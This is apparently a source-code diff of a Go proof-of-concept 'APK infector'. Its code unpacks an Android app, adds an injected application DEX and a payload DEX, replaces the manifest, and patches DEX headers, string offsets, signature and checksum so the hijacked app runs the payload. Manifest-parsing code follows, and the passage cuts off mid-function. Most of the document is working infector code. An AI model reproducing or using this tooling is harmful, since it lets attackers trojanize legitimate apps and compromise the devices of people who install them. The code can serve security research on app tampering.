If nothing helped, try to play with the `-min-api` parameter when compiling payload classes.
|
||||
If nothing worked, then create an issue on github.
|
||||
|
||||
|
||||
PoC includes files from https://github.com/avast/apkparser.
|
||||
|
||||
I am not a Go developer so forgive me for the quality of code
|
|
@ -0,0 +1,240 @@
|
|||
package common
|
||||
|
||||
import (
|
||||
"archive/zip"
|
||||
"compress/flate"
|
||||
"fmt"
|
||||
"io"
|
||||
"io/ioutil"
|
||||
"log"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strconv"
|
||||
"strings"
|
||||
)
|
||||
|
||||
var zipOutput, _ = filepath.Abs("sample_unzipped")
|
||||
var injectedAppPrevName, _ = filepath.Abs("InjectedApp_patched.dex")
|
||||
var payloadPrevName, _ = filepath.Abs("payload.dex")
|
||||
|
||||
func Inject(path string, zipModifiedOutput string) {
|
||||
|
||||
if _, err := os.Stat(zipOutput); err == nil {
|
||||
err := os.RemoveAll(zipOutput)
|
||||
if err != nil {
|
||||
log.Panic(err)
|
||||
}
|
||||
}
|
||||
if _, err := os.Stat(zipModifiedOutput); err == nil {
|
||||
err := os.Remove(zipModifiedOutput)
|
||||
if err != nil {
|
||||
log.Panic(err)
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
//unzip apk
|
||||
files, err := unzip(path, zipOutput)
|
||||
if err != nil {
|
||||
log.Panic("Failed to unzip APK",err)
|
||||
//log.Printf("Unzipped:\n" + strings.Join(files, "\n"))
|
||||
}
|
||||
|
||||
//calc classes.dex index
|
||||
max := strings.Count(strings.Join(files, ""), "classes")
|
||||
log.Printf("max classes dex index = %d", max)
|
||||
max += 1
|
||||
|
||||
// inject InjectedApp.dex
|
||||
var injectedAppNewName = "classes" + strconv.Itoa(max) + ".dex"
|
||||
|
||||
|
||||
copy(injectedAppPrevName, zipOutput + "\\" + injectedAppNewName)
|
||||
|
||||
max +=1
|
||||
|
||||
// inject payload.dex
|
||||
var payloadNewName = "classes" + strconv.Itoa(max) + ".dex"
|
||||
|
||||
|
||||
copy(payloadPrevName, zipOutput + "\\" + payloadNewName)
|
||||
|
||||
log.Printf("Successfuly injected DEX:" + injectedAppNewName + "," + payloadNewName)
|
||||
|
||||
//replace manifest
|
||||
copy(ManifestBinaryPath, zipOutput + "\\AndroidManifest.xml")
|
||||
|
||||
files = append(files[0:], zipOutput + "\\" + injectedAppNewName)
|
||||
files = append(files[0:], zipOutput + "\\" + payloadNewName)
|
||||
|
||||
// zip all files
|
||||
fmt.Println("\t--zipping...")
|
||||
ZipWriter(zipModifiedOutput)
|
||||
|
||||
//delete sample_unzipped - we dont need it
|
||||
|
||||
if _, err := os.Stat(zipOutput); err == nil {
|
||||
err := os.RemoveAll(zipOutput)
|
||||
if err != nil {
|
||||
log.Panic(err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
func ZipWriter(zipModifiedOutput string) {
|
||||
baseFolder,_ := filepath.Abs("sample_unzipped")
|
||||
|
||||
// Get a Buffer to Write To
|
||||
outFile, err := os.Create(zipModifiedOutput)
|
||||
if err != nil {
|
||||
fmt.Println(err)
|
||||
}
|
||||
defer outFile.Close()
|
||||
|
||||
// Create a new zip archive.
|
||||
w := zip.NewWriter(outFile)
|
||||
|
||||
// Register a custom Deflate compressor.
|
||||
w.RegisterCompressor(zip.Deflate, func(out io.Writer) (io.WriteCloser, error) {
|
||||
return flate.NewWriter(out, flate.BestCompression)
|
||||
})
|
||||
|
||||
// Add some files to the archive.
|
||||
addFiles(w, baseFolder, "")
|
||||
|
||||
if err != nil {
|
||||
fmt.Println(err)
|
||||
}
|
||||
|
||||
// Make sure to check the error on Close.
|
||||
err = w.Close()
|
||||
if err != nil {
|
||||
fmt.Println(err)
|
||||
}
|
||||
}
|
||||
|
||||
func addFiles(w *zip.Writer, basePath, baseInZip string) {
|
||||
// Open the Directory
|
||||
files, err := ioutil.ReadDir(basePath)
|
||||
if err != nil {
|
||||
fmt.Println(err)
|
||||
}
|
||||
|
||||
for _, file := range files {
|
||||
//fmt.Println(basePath + file.Name())
|
||||
if !file.IsDir() {
|
||||
dat, err := ioutil.ReadFile(basePath + "\\" + file.Name())
|
||||
if err != nil {
|
||||
fmt.Println(err)
|
||||
}
|
||||
|
||||
// Add some files to the archive.
|
||||
f, err := w.Create(baseInZip + file.Name())
|
||||
if err != nil {
|
||||
fmt.Println(err)
|
||||
}
|
||||
_, err = f.Write(dat)
|
||||
if err != nil {
|
||||
fmt.Println(err)
|
||||
}
|
||||
} else if file.IsDir() {
|
||||
|
||||
// Recurse
|
||||
newBase := basePath + "\\" + file.Name()
|
||||
//fmt.Println("Recursing and Adding SubDir: " + file.Name())
|
||||
//fmt.Println("Recursing and Adding SubDir: " + newBase)
|
||||
|
||||
recPath := baseInZip + file.Name() + "/"
|
||||
addFiles(w, newBase, recPath)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
func copy(src, dst string){
|
||||
sourceFileStat, err := os.Stat(src)
|
||||
if err != nil {
|
||||
log.Panic("Failed to inject DEX", err)
|
||||
}
|
||||
|
||||
if !sourceFileStat.Mode().IsRegular() {
|
||||
log.Panic("Failed to inject DEX", err)
|
||||
}
|
||||
|
||||
source, err := os.Open(src)
|
||||
if err != nil {
|
||||
log.Panic("Failed to inject DEX", err)
|
||||
}
|
||||
defer source.Close()
|
||||
|
||||
destination, err := os.Create(dst)
|
||||
if err != nil {
|
||||
log.Panic("Failed to inject DEX", err)
|
||||
}
|
||||
defer destination.Close()
|
||||
_, err = io.Copy(destination, source)
|
||||
if err != nil {
|
||||
log.Panic("Failed to inject DEX", err)
|
||||
}
|
||||
}
|
||||
|
||||
// Unzip will decompress a zip archive, moving all files and folders
|
||||
// within the zip file (parameter 1) to an output directory (parameter 2).
|
||||
func unzip(src string, dest string) ([]string, error) {
|
||||
|
||||
var filenames []string
|
||||
|
||||
r, err := zip.OpenReader(src)
|
||||
if err != nil {
|
||||
return filenames, err
|
||||
}
|
||||
defer r.Close()
|
||||
|
||||
for _, f := range r.File {
|
||||
|
||||
// Store filename/path for returning and using later on
|
||||
fpath := filepath.Join(dest, f.Name)
|
||||
|
||||
// Check for ZipSlip. More Info: http://bit.ly/2MsjAWE
|
||||
if !strings.HasPrefix(fpath, filepath.Clean(dest)+string(os.PathSeparator)) {
|
||||
return filenames, fmt.Errorf("%s: illegal file path", fpath)
|
||||
}
|
||||
|
||||
filenames = append(filenames, fpath)
|
||||
|
||||
if f.FileInfo().IsDir() {
|
||||
// Make Folder
|
||||
os.MkdirAll(fpath, os.ModePerm)
|
||||
continue
|
||||
}
|
||||
|
||||
// Make File
|
||||
if err = os.MkdirAll(filepath.Dir(fpath), os.ModePerm); err != nil {
|
||||
return filenames, err
|
||||
}
|
||||
|
||||
outFile, err := os.OpenFile(fpath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())
|
||||
if err != nil {
|
||||
return filenames, err
|
||||
}
|
||||
|
||||
rc, err := f.Open()
|
||||
if err != nil {
|
||||
return filenames, err
|
||||
}
|
||||
|
||||
_, err = io.Copy(outFile, rc)
|
||||
|
||||
// Close the file without defer to close before next iteration of loop
|
||||
outFile.Close()
|
||||
rc.Close()
|
||||
|
||||
if err != nil {
|
||||
return filenames, err
|
||||
}
|
||||
}
|
||||
return filenames, nil
|
||||
}
|
||||
|
|
@ -0,0 +1,29 @@
|
|||
package common
|
||||
|
||||
import (
|
||||
"log"
|
||||
"os"
|
||||
"path/filepath"
|
||||
)
|
||||
|
||||
var ManifestBinaryPath, _ = filepath.Abs("AndroidManifest.xml")
|
||||
|
||||
func WriteChanges(raw []byte, path string) {
|
||||
//Open a new file for writing only
|
||||
file, err := os.OpenFile(
|
||||
path,
|
||||
os.O_WRONLY|os.O_TRUNC|os.O_CREATE,
|
||||
0666,
|
||||
)
|
||||
if err != nil {
|
||||
panic(err)
|
||||
}
|
||||
defer file.Close()
|
||||
|
||||
// Write bytes to file
|
||||
_, err = file.Write(raw)
|
||||
if err != nil {
|
||||
log.Panic("Failed to write changes to disk", err)
|
||||
}
|
||||
}
|
||||
|
|
@ -0,0 +1,209 @@
|
|||
package mydex
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"common"
|
||||
"crypto/sha1"
|
||||
"encoding/binary"
|
||||
"hash/adler32"
|
||||
"io/ioutil"
|
||||
"log"
|
||||
"manifest"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
)
|
||||
|
||||
|
||||
const (
|
||||
// DEX structure offsets
|
||||
fileSizeOff = 0x20
|
||||
mapOff = 0x34
|
||||
dataSizeOff = 0x68
|
||||
signatureOff = 0x20
|
||||
checksumOff = 0xc
|
||||
stringIdsCount = 0x3 //how many stringIds we should change
|
||||
classDataOffOff = 0xe4 //map->class_def_item->class_data_off
|
||||
classDataItemOffOff = 0x29c //map->class_data_item->offset
|
||||
annotationOffItemOff = 0x2a8 //map->annotation_set_item->entries->annotation_off_item
|
||||
mapListOffOff = 0x2b4 //map->map_list->offset
|
||||
posStringIdsChangedOff = 0x84
|
||||
)
|
||||
|
||||
// this name is patched so we should make it
|
||||
// as short as possible
|
||||
//var placeholder = "La/a/a;"
|
||||
var placeholder = "Lz/z/z;"
|
||||
var placeholderLength = len(placeholder) + 1
|
||||
var placeholderOff int
|
||||
var dexPath, _ = filepath.Abs("InjectedApp.dex")
|
||||
var dexPathNew, _ = filepath.Abs("InjectedApp_patched.dex")
|
||||
|
||||
// SHA-1 signature (hash) of the rest of the file (everything but magic, checksum, and this field); used to uniquely identify files
|
||||
func patchSignature(data []byte) {
|
||||
|
||||
signature := sha1.Sum(data[signatureOff:])
|
||||
|
||||
log.Printf("New DEX Signature = %x\n", signature)
|
||||
|
||||
// patch signature
|
||||
for i := 0; i < 20; i++ {
|
||||
data[0xc+i] = signature[i]
|
||||
}
|
||||
}
|
||||
|
||||
// adler32 checksum of the rest of the file (everything but magic and this field); used to detect file corruption
|
||||
func patchChecksum(data []byte) {
|
||||
checksum := adler32.Checksum(data[checksumOff:])
|
||||
|
||||
log.Printf("New DEX Checksum = %x\n", checksum)
|
||||
|
||||
// patch checksum
|
||||
binary.LittleEndian.PutUint32(data[0x8:], checksum)
|
||||
}
|
||||
|
||||
// Yes, dex uses sleb and uleb data types not uint32
|
||||
// But we use our predictable DEX so we can ignore it
|
||||
|
||||
// What is changed in DEX after patching parent class?
|
||||
// DEX format doc: https://source.android.com/devices/tech/dalvik/dex-format
|
||||
/*
|
||||
header_item->checksum
|
||||
header_item->signature
|
||||
header_item->file_size
|
||||
header_item->map_off
|
||||
header_item->data_size
|
||||
string_id_item->string_data_off
|
||||
map->class_def_item->class_data_off
|
||||
string_data_item->utf16_size
|
||||
map->class_data_item->offset
|
||||
map->annotation_set_item->entries->annotation_off_item
|
||||
map->map_list->offset
|
||||
|
||||
*/
|
||||
// Do not forget about alignment of some structures!
|
||||
|
||||
func Patch() {
|
||||
|
||||
data, err := ioutil.ReadFile(dexPath)
|
||||
if err != nil {
|
||||
log.Panicf("DEX Failed to read %s", dexPath)
|
||||
}
|
||||
|
||||
// calc offset to placeholder
|
||||
placeholderOff = bytes.Index(data, []byte(placeholder))
|
||||
|
||||
log.Printf("placeholderOff = 0x%x\n", placeholderOff)
|
||||
|
||||
// we should add "L" and ";", and convert "."->"/" to be a normal DEX string
|
||||
//tmpName := "z.z.zzzzzzzzzzzzzzzz"
|
||||
oldAppNameNormalized := "L" + strings.ReplaceAll(manifest.OldAppNameUTF8, ".", "/") + ";"
|
||||
//oldAppNameNormalized := "L" + strings.ReplaceAll(tmpName, ".", "/") + ";"
|
||||
newAppName := oldAppNameNormalized + "\x00"
|
||||
|
||||
// patch string len (string_data_item->utf16_size)
|
||||
// -1 - it's a position of len before every string in dex
|
||||
data[placeholderOff - 1] = uint8(len(oldAppNameNormalized))
|
||||
|
||||
// how many bytes we added to DEX?
|
||||
var sizeDiff uint32
|
||||
sizeDiff = uint32(len(newAppName) - placeholderLength)
|
||||
log.Printf("sizeDiff =0x%x", sizeDiff)
|
||||
|
||||
// how many align bytes we should add
|
||||
var alignCount uint32
|
||||
alignCount = 4 - (sizeDiff % 4)
|
||||
|
||||
if alignCount == 4 {
|
||||
alignCount = 0
|
||||
}
|
||||
log.Printf("alignCount = 0x%x", alignCount)
|
||||
|
||||
// patch mapOff (header_item->map_off)
|
||||
var oldMapOff uint32
|
||||
oldMapOff = binary.LittleEndian.Uint32(data[mapOff:])
|
||||
newMapOff := oldMapOff + sizeDiff + alignCount
|
||||
binary.LittleEndian.PutUint32(data[mapOff:], newMapOff)
|
||||
log.Printf("old mapOff = 0x%0x | new mapOff = 0x%0x\n", oldMapOff, newMapOff)
|
||||
|
||||
// patch datasize (header_item->data_size)
|
||||
var oldDataSize uint32
|
||||
oldDataSize = binary.LittleEndian.Uint32(data[dataSizeOff:])
|
||||
newDataSize := oldDataSize + sizeDiff + alignCount
|
||||
binary.LittleEndian.PutUint32(data[dataSizeOff:], newDataSize)
|
||||
log.Printf("old dataSize = 0x%0x | new dataSize = 0x%0x\n", oldDataSize, newDataSize)
|
||||
|
||||
// patch stringIds (string_id_item->string_data_off)
|
||||
// stringIds - table of offsets to strings
|
||||
// offsets counted from the start (0x0)
|
||||
// posStringIdsChangedOff - position in our DEX from which we start changing
|
||||
|
||||
// we hardcoded it because we use our predictable DEX
|
||||
var oldId uint32
|
||||
stringIdsReader := bytes.NewReader(data[posStringIdsChangedOff:])
|
||||
|
||||
j := 0
|
||||
|
||||
for i := 0; i < stringIdsCount; i++ {
|
||||
|
||||
err = binary.Read(stringIdsReader, binary.LittleEndian, &oldId)
|
||||
if err != nil {
|
||||
log.Panic("Failed to read stringId", err)
|
||||
}
|
||||
|
||||
newId := oldId + sizeDiff
|
||||
binary.LittleEndian.PutUint32(data[posStringIdsChangedOff + j:], newId)
|
||||
j += 4
|
||||
}
|
||||
|
||||
// patch map->class_def_item->class_data_off (4 byte)
|
||||
classDataOff := binary.LittleEndian.Uint32(data[classDataOffOff:])
|
||||
newClassDataOff := classDataOff + sizeDiff
|
||||
binary.LittleEndian.PutUint32(data[classDataOffOff:], newClassDataOff)
|
||||
|
||||
log.Printf("off = 0x%x | classDataOff = 0x%x | newClassDataOff = 0x%x",
|
||||
classDataOffOff, classDataOff, newClassDataOff)
|
||||
|
||||
// patch map->class_data_item->offset (dont apply alignment)
|
||||
classDataItemOff := binary.LittleEndian.Uint32(data[classDataItemOffOff:])
|
||||
newClassDataItemOff := classDataItemOff + sizeDiff
|
||||
binary.LittleEndian.PutUint32(data[classDataItemOffOff:], newClassDataItemOff)
|
||||
log.Printf("off = 0x%x | classDataItemOff = 0x%x | newClassDataItemOff = 0x%x",
|
||||
classDataItemOffOff, classDataItemOff, newClassDataItemOff)
|
||||
|
||||
// patch map->annotation_set_item->entries->annotation_off_item
|
||||
annotationOffItem := binary.LittleEndian.Uint32(data[annotationOffItemOff:])
|
||||
newAnnotationOffItem := annotationOffItem + sizeDiff + alignCount
|
||||
binary.LittleEndian.PutUint32(data[annotationOffItemOff:], newAnnotationOffItem)
|
||||
log.Printf("off = 0x%x | annotationOffItem = 0x%x | newAnnotationOffItem = 0x%x",
|
||||
annotationOffItemOff, annotationOffItem, newAnnotationOffItem)
|
||||
|
||||
//patch map->map_list->offset
|
||||
mapListOff := binary.LittleEndian.Uint32(data[mapListOffOff:])
|
||||
newMapListOff := mapListOff + sizeDiff + alignCount
|
||||
binary.LittleEndian.PutUint32(data[mapListOffOff:], newMapListOff)
|
||||
log.Printf("off = 0x%x | mapListOff = 0x%x | newMapListOff = 0x%x",
|
||||
mapListOffOff, mapListOff, newMapListOff)
|
||||
|
||||
// from now we start patching second half of DEX (after array of strings)
|
||||
// but first we need to insert alignment bytes
|
||||
if alignCount != 0 {
|
||||
var alignSlice = make([]byte, alignCount)
|
||||
var alignPos uint32 = 0x220
|
||||
// insert byte alignment
|
||||
data = append(data[:alignPos], append(alignSlice, data[alignPos:]...)...)
|
||||
}
|
||||
|
||||
// insert new parent application name
|
||||
data = append(data[:placeholderOff], append([]byte(newAppName), data[placeholderOff + placeholderLength:]...)...)
|
||||
|
||||
// patch new fileSize (header_item->file_size)
|
||||
var fileSize = uint32(len(data))
|
||||
binary.LittleEndian.PutUint32(data[fileSizeOff:], fileSize)
|
||||
|
||||
log.Printf("fileSize = 0x%x", fileSize)
|
||||
|
||||
patchSignature(data[0:])
|
||||
patchChecksum(data[0:])
|
||||
|
||||
common.WriteChanges(data, dexPathNew)
|
||||
}
|
|
@ -0,0 +1,5 @@
|
|||
module github.com/thatskriptkid/apk-infector-Archinome-PoC
|
||||
|
||||
go 1.14
|
||||
|
||||
require golang.org/x/text v0.3.3 // indirect
|
|
@ -0,0 +1,3 @@
|
|||
golang.org/x/text v0.3.3 h1:cokOdA+Jmi5PJGXLlLllQSgYigAEfHXJAERHVMaCc2k=
|
||||
golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
|
||||
golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
|
|
@ -0,0 +1,174 @@
|
|||
// Package apkparser parses AndroidManifest.xml and resources.arsc from Android APKs.
|
||||
package manifest
|
||||
|
||||
import (
|
||||
"common"
|
||||
"fmt"
|
||||
"io"
|
||||
"log"
|
||||
"os"
|
||||
)
|
||||
|
||||
type ApkParser struct {
|
||||
apkPath string
|
||||
zip *ZipReader
|
||||
|
||||
encoder ManifestEncoder
|
||||
resources *ResourceTable
|
||||
}
|
||||
|
||||
// save manifest to disk for binary patching
|
||||
|
||||
func (p *ApkParser) SaveManifestToDisk() {
|
||||
|
||||
file := p.zip.File["AndroidManifest.xml"]
|
||||
|
||||
if file == nil {
|
||||
fmt.Errorf("Failed to find %s in APK!", "AndroidManifest.xml")
|
||||
}
|
||||
|
||||
if err := file.Open(); err != nil {
|
||||
panic(err)
|
||||
}
|
||||
defer file.Close()
|
||||
|
||||
// open output file
|
||||
fo, err := os.Create(common.ManifestBinaryPath)
|
||||
if err != nil {
|
||||
panic(err)
|
||||
}
|
||||
// close fo on exit and check for its returned error
|
||||
defer func() {
|
||||
if err := fo.Close(); err != nil {
|
||||
panic(err)
|
||||
}
|
||||
}()
|
||||
|
||||
// make a buffer to keep chunks that are read
|
||||
buf := make([]byte, 1024)
|
||||
for {
|
||||
// read a chunk
|
||||
n, err := file.Read(buf)
|
||||
if err != nil && err != io.EOF {
|
||||
panic(err)
|
||||
}
|
||||
if n == 0 {
|
||||
break
|
||||
}
|
||||
|
||||
// write a chunk
|
||||
if _, err := fo.Write(buf[:n]); err != nil {
|
||||
panic(err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Calls ParseApkReader
|
||||
func ParseApk(path string, encoder ManifestEncoder) {
|
||||
f, zipErr := os.Open(path)
|
||||
if zipErr != nil {
|
||||
log.Panic("Failed to open apk")
|
||||
}
|
||||
defer f.Close()
|
||||
|
||||
ParseApkReader(f, encoder)
|
||||
}
|
||||
|
||||
// Parse APK's Manifest, including resolving refences to resource values.
|
||||
// encoder expects an XML encoder instance, like Encoder from encoding/xml package.
|
||||
//
|
||||
// zipErr != nil means the APK couldn't be opened. The manifest will be parsed
|
||||
// even when resourcesErr != nil, just without reference resolving.
|
||||
func ParseApkReader(r io.ReadSeeker, encoder ManifestEncoder) {
|
||||
zip, zipErr := OpenZipReader(r)
|
||||
if zipErr != nil {
|
||||
log.Panic("Failed to open zip reader")
|
||||
}
|
||||
defer zip.Close()
|
||||
|
||||
ParseApkWithZip(zip, encoder)
|
||||
}
|
||||
|
||||
// Parse APK's Manifest, including resolving refences to resource values.
|
||||
// encoder expects an XML encoder instance, like Encoder from encoding/xml package.
|
||||
//
|
||||
// Use this if you already opened the zip with OpenZip or OpenZipReader before.
|
||||
// This method will not Close() the zip.
|
||||
//
|
||||
// The manifest will be parsed even when resourcesErr != nil, just without reference resolving.
|
||||
func ParseApkWithZip(zip *ZipReader, encoder ManifestEncoder) {
|
||||
apkParser := ApkParser{
|
||||
zip: zip,
|
||||
encoder: encoder,
|
||||
}
|
||||
|
||||
fmt.Println("\t--Parsing resources...")
|
||||
apkParser.parseResources()
|
||||
|
||||
fmt.Println("\t--Parsing manifest...")
|
||||
apkParser.ParseXml("AndroidManifest.xml")
|
||||
|
||||
apkParser.SaveManifestToDisk()
|
||||
|
||||
}
|
||||
|
||||
// Prepare the ApkParser instance, load resources if possible.
|
||||
// encoder expects an XML encoder instance, like Encoder from encoding/xml package.
|
||||
//
|
||||
// This method will not Close() the zip, you are still the owner.
|
||||
func NewParser(zip *ZipReader, encoder ManifestEncoder) (parser *ApkParser) {
|
||||
parser = &ApkParser{
|
||||
zip: zip,
|
||||
encoder: encoder,
|
||||
}
|
||||
parser.parseResources()
|
||||
return
|
||||
}
|
||||
|
||||
func (p *ApkParser) parseResources() {
|
||||
if p.resources != nil {
|
||||
log.Panic("resources is not nil")
|
||||
}
|
||||
|
||||
defer func() {
|
||||
if r := recover(); r != nil {
|
||||
log.Panic("recover() not nil")
|
||||
}
|
||||
}()
|
||||
|
||||
resourcesFile := p.zip.File["resources.arsc"]
|
||||
if resourcesFile == nil {
|
||||
log.Panic("resource.arsc not found")
|
||||
}
|
||||
|
||||
if err := resourcesFile.Open(); err != nil {
|
||||
log.Panic("Failed to open resources.arsc: %s", err.Error())
|
||||
}
|
||||
defer resourcesFile.Close()
|
||||
p.resources = ParseResourceTable(resourcesFile)
|
||||
}
|
||||
|
||||
func (p *ApkParser) ParseXml(name string) {
|
||||
|
||||
file := p.zip.File[name]
|
||||
|
||||
if file == nil {
|
||||
log.Panicf("Failed to find %s in APK!", name)
|
||||
}
|
||||
|
||||
if err := file.Open(); err != nil {
|
||||
log.Panic("Failed to open manifest")
|
||||
}
|
||||
defer file.Close()
|
||||
|
||||
var lastErr error
|
||||
for file.Next() {
|
||||
if err := ParseXml(&myReader{r: file}, p.encoder, p.resources); err != nil {
|
||||
lastErr = err
|
||||
}
|
||||
}
|
||||
|
||||
if lastErr == ErrPlainTextManifest {
|
||||
log.Panic("Manifest in plaintext")
|
||||
}
|
||||
}
|
File diff suppressed because it is too large
Load diff
|
@ -0,0 +1,375 @@
|
|||
package manifest
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/binary"
|
||||
"encoding/xml"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"io/ioutil"
|
||||
"strconv"
|
||||
"strings"
|
||||
"unsafe"
|
||||
)
|
||||
|
||||
type binxmlParseInfo struct {
|
||||
strings stringTable
|
||||
resourceIds []uint32
|
||||
|
||||
encoder ManifestEncoder
|
||||
res *ResourceTable
|
||||
}
|
||||
|
||||
// Some samples have manifest in plaintext, this is an error.
|
||||
// 2c882a2376034ed401be082a42a21f0ac837689e7d3ab6be0afb82f44ca0b859
|
||||
var ErrPlainTextManifest = errors.New("xml is in plaintext, binary form expected")
|
||||
|
||||
// Deprecated: just calls ParseXML
|
||||
func ParseManifest(r io.Reader, enc ManifestEncoder, resources *ResourceTable) error {
|
||||
return ParseXml(r, enc, resources)
|
||||
}
|
||||
|
||||
// the main purpose of this reader is to
|
||||
// count number of bytes readed after parsing string table
|
||||
// so we can calc offset to the end of the string table
|
||||
type myReader struct {
|
||||
read int
|
||||
r io.Reader
|
||||
}
|
||||
|
||||
type myRead interface {
|
||||
GetRead() int
|
||||
}
|
||||
|
||||
func (mr *myReader) Read(p []byte) (n int, err error) {
|
||||
n, err = mr.r.Read(p)
|
||||
mr.read += n
|
||||
return
|
||||
}
|
||||
|
||||
func (mr *myReader) GetRead() int {
|
||||
return mr.read
|
||||
}
|
||||
|
||||
// Parse the binary Xml format. The resources are optional and can be nil.
|
||||
func ParseXml(r io.Reader, enc ManifestEncoder, resources *ResourceTable) error {
|
||||
x := binxmlParseInfo{
|
||||
encoder: enc,
|
||||
res: resources,
|
||||
}
|
||||
|
||||
id, headerLen, totalLen, err := parseChunkHeader(r)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
//check if manifest is binary not plaintext
|
||||
if (id & 0xFF) == '<' {
|
||||
buf := bytes.NewBuffer(make([]byte, 0, 8))
|
||||
binary.Write(buf, binary.LittleEndian, &id)
|
||||
binary.Write(buf, binary.LittleEndian, &headerLen)
|
||||
binary.Write(buf, binary.LittleEndian, &totalLen)
|
||||
|
||||
if s := buf.String(); strings.HasPrefix(s, "<?xml ") || strings.HasPrefix(s, "<manif") {
|
||||
return ErrPlainTextManifest
|
||||
}
|
||||
}
|
||||
|
||||
// Android doesn't care.
|
||||
/*if id != chunkAxmlFile {
|
||||
return fmt.Errorf("Invalid top chunk id: 0x%08x", id)
|
||||
}*/
|
||||
|
||||
defer x.encoder.Flush()
|
||||
|
||||
totalLen -= chunkHeaderSize
|
||||
|
||||
var len uint32
|
||||
var lastId uint16
|
||||
for i := uint32(0); i < totalLen; i += len {
|
||||
id, _, len, err = parseChunkHeader(r)
|
||||
if err != nil {
|
||||
return fmt.Errorf("Error parsing header at 0x%08x of 0x%08x %08x: %s", i, totalLen, lastId, err.Error())
|
||||
}
|
||||
|
||||
lastId = id
|
||||
|
||||
lm := &io.LimitedReader{R: r, N: int64(len) - 2*4}
|
||||
|
||||
switch id {
|
||||
case chunkStringTable:
|
||||
x.strings, err = parseStringTable(lm)
|
||||
case chunkResourceIds:
|
||||
err = x.parseResourceIds(lm)
|
||||
default:
|
||||
if (id & chunkMaskXml) == 0 {
|
||||
err = fmt.Errorf("Unknown chunk id 0x%x", id)
|
||||
break
|
||||
}
|
||||
|
||||
// skip line number and unknown 0xFFFFFFFF
|
||||
if _, err = io.CopyN(ioutil.Discard, lm, 2*4); err != nil {
|
||||
break
|
||||
}
|
||||
|
||||
switch id {
|
||||
case chunkXmlNsStart:
|
||||
err = x.parseNsStart(lm)
|
||||
case chunkXmlNsEnd:
|
||||
err = x.parseNsEnd(lm)
|
||||
case chunkXmlTagStart:
|
||||
err = x.parseTagStart(lm)
|
||||
case chunkXmlTagEnd:
|
||||
err = x.parseTagEnd(lm)
|
||||
case chunkXmlText:
|
||||
err = x.parseText(lm)
|
||||
default:
|
||||
err = fmt.Errorf("Unknown chunk id 0x%x", id)
|
||||
}
|
||||
}
|
||||
|
||||
if err == ErrEndParsing {
|
||||
break
|
||||
} else if err != nil {
|
||||
return fmt.Errorf("Chunk: 0x%08x: %s", id, err.Error())
|
||||
} else if lm.N != 0 {
|
||||
return fmt.Errorf("Chunk: 0x%08x: was not fully read", id)
|
||||
}
|
||||
}
|
||||
|
||||
return x.encoder.Flush()
|
||||
}
|
||||
|
||||
func (x *binxmlParseInfo) parseResourceIds(r *io.LimitedReader) error {
|
||||
if (r.N % 4) != 0 {
|
||||
return fmt.Errorf("Invalid chunk size!")
|
||||
}
|
||||
|
||||
count := uint32(r.N / 4)
|
||||
var id uint32
|
||||
for i := uint32(0); i < count; i++ {
|
||||
if err := binary.Read(r, binary.LittleEndian, &id); err != nil {
|
||||
return err
|
||||
}
|
||||
x.resourceIds = append(x.resourceIds, id)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (x *binxmlParseInfo) parseNsStart(r *io.LimitedReader) error {
|
||||
var err error
|
||||
ns := &xml.Name{}
|
||||
|
||||
var idx uint32
|
||||
if err = binary.Read(r, binary.LittleEndian, &idx); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
if ns.Local, err = x.strings.get(idx); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
if err = binary.Read(r, binary.LittleEndian, &idx); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
if ns.Space, err = x.strings.get(idx); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// TODO: what to do with this?
|
||||
_ = ns
|
||||
return nil
|
||||
}
|
||||
|
||||
func (x *binxmlParseInfo) parseNsEnd(r *io.LimitedReader) error {
|
||||
if _, err := io.CopyN(ioutil.Discard, r, 2*4); err != nil {
|
||||
return fmt.Errorf("error skipping: %s", err.Error())
|
||||
}
|
||||
|
||||
// TODO: what to do with this?
|
||||
return nil
|
||||
}
|
||||
|
||||
func (x *binxmlParseInfo) parseTagStart(r *io.LimitedReader) error {
|
||||
var namespaceIdx, nameIdx, attrCnt, classAttrIdx uint32
|
||||
|
||||
if err := binary.Read(r, binary.LittleEndian, &namespaceIdx); err != nil {
|
||||
return fmt.Errorf("error reading namespace idx: %s", err.Error())
|
||||
}
|
||||
|
||||
if err := binary.Read(r, binary.LittleEndian, &nameIdx); err != nil {
|
||||
return fmt.Errorf("error reading name idx: %s", err.Error())
|
||||
}
|
||||
|
||||
if _, err := io.CopyN(ioutil.Discard, r, 4); err != nil {
|
||||
return fmt.Errorf("error skipping flag: %s", err.Error())
|
||||
}
|
||||
|
||||
if err := binary.Read(r, binary.LittleEndian, &attrCnt); err != nil {
|
||||
return fmt.Errorf("error reading attrCnt: %s", err.Error())
|
||||
}
|
||||
|
||||
if err := binary.Read(r, binary.LittleEndian, &classAttrIdx); err != nil {
|
||||
return fmt.Errorf("error reading classAttr: %s", err.Error())
|
||||
}
|
||||
|
||||
idAttributeIdx := (attrCnt >> 16) - 1
|
||||
attrCnt = (attrCnt & 0xFFFF)
|
||||
|
||||
styleAttrIdx := (classAttrIdx >> 16) - 1
|
||||
classAttrIdx = (classAttrIdx & 0xFFFF)
|
||||
|
||||
_ = styleAttrIdx
|
||||
_ = idAttributeIdx
|
||||
|
||||
namespace, err := x.strings.get(namespaceIdx)
|
||||
if err != nil {
|
||||
return fmt.Errorf("error decoding namespace: %s", err.Error())
|
||||
}
|
||||
|
||||
name, err := x.strings.get(nameIdx)
|
||||
